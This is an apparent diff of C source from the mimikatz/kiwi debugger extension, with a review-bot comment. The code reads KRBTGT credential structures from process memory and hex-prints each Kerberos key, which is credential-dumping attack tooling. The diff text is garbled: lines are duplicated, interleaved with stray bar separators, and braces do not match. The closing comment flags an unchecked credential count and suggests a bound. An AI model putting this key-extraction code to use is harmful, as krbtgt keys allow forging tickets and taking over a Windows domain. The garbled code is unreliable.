sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_6) + (tmpCred6.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_6);
|
||||
if(creds6 = (PKIWI_KRBTGT_CREDENTIALS_6) LocalAlloc(LPTR, sizeForCreds))
|
||||
if(ReadMemory((ULONG_PTR) addr, &tmpCred6, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6), NULL))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) addr, creds6, sizeForCreds, NULL))
|
||||
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_6) + (tmpCred6.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_6);
|
||||
if(creds6 = (PKIWI_KRBTGT_CREDENTIALS_6) LocalAlloc(LPTR, sizeForCreds))
|
||||
{
|
||||
dprintf("%u credentials\n", creds6->cbCred);
|
||||
for(i = 0; i < creds6->cbCred; i++)
|
||||
if(ReadMemory((ULONG_PTR) addr, creds6, sizeForCreds, NULL))
|
||||
{
|
||||
dprintf("\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds6->credentials[i].type)));
|
||||
if(buffer = LocalAlloc(LPTR, PtrToUlong(creds6->credentials[i].size)))
|
||||
dprintf("%u credentials\n", creds6->cbCred);
|
||||
for(i = 0; i < creds6->cbCred; i++)
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) creds6->credentials[i].key, buffer, PtrToUlong(creds6->credentials[i].size), NULL))
|
||||
kull_m_string_dprintf_hex(buffer, PtrToUlong(creds6->credentials[i].size), 0);
|
||||
LocalFree(buffer);
|
||||
dprintf("\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds6->credentials[i].type)));
|
||||
if(buffer = LocalAlloc(LPTR, PtrToUlong(creds6->credentials[i].size)))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) creds6->credentials[i].key, buffer, PtrToUlong(creds6->credentials[i].size), NULL))
|
||||
kull_m_string_dprintf_hex(buffer, PtrToUlong(creds6->credentials[i].size), 0);
|
||||
LocalFree(buffer);
|
||||
}
|
||||
dprintf("\n");
|
||||
}
|
||||
dprintf("\n");
|
||||
}
|
||||
LocalFree(creds6);
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) addr, &tmpCred64, sizeof(KIWI_KRBTGT_CREDENTIALS_64) - sizeof(KIWI_KRBTGT_CREDENTIAL_64), NULL))
|
||||
{
|
||||
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_64) + (tmpCred64.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_64);
|
||||
if(creds64 = (PKIWI_KRBTGT_CREDENTIALS_64) LocalAlloc(LPTR, sizeForCreds))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) addr, creds64, sizeForCreds, NULL))
|
||||
{
|
||||
dprintf("%u credentials\n", creds64->cbCred);
|
||||
for(i = 0; i < creds64->cbCred; i++)
|
||||
{
|
||||
dprintf("\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds64->credentials[i].type)));
|
||||
if(buffer = LocalAlloc(LPTR, PtrToUlong(creds64->credentials[i].size)))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) creds64->credentials[i].key, buffer, PtrToUlong(creds64->credentials[i].size), NULL))
|
||||
kull_m_string_dprintf_hex(buffer, PtrToUlong(creds64->credentials[i].size), 0);
|
||||
LocalFree(buffer);
|
||||
}
|
||||
dprintf("\n");
|
||||
}
|
||||
}
|
||||
LocalFree(creds64);
|
||||
}
|
||||
LocalFree(creds6);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
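Review bot: The new 1607 branch computes `sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_64) + (tmpCred64.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_64);` from a `cbCred` that `ReadMemory` just pulled from the target, so a zero or oversized count yields a DWORD size that no longer matches the layout while `for(i = 0; i < creds64->cbCred; i++)` still iterates the full count over the smaller allocation. A bound before the allocation, e.g. `if(tmpCred64.cbCred && tmpCred64.cbCred <= (MAXDWORD - sizeof(KIWI_KRBTGT_CREDENTIALS_64)) / sizeof(KIWI_KRBTGT_CREDENTIAL_64))`, would keep a corrupt or hostile dump from crashing the extension. The function appears to mirror the sekurlsa-side kuhl_m_sekurlsa_krbtgt_keys line for line, so whichever check is adopted should land in both copies.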